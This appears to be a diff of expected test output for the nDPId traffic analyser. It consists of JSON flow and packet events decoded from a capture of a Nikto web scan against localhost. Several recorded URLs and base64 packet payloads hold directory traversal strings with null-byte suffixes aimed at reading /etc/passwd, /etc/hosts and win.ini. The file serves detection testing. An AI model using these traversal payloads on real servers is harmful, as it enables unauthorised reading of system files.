{"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} -01142{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01142{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01144{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01144{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01154{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7580000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7580000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} -01145{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 
+01145{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7580000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 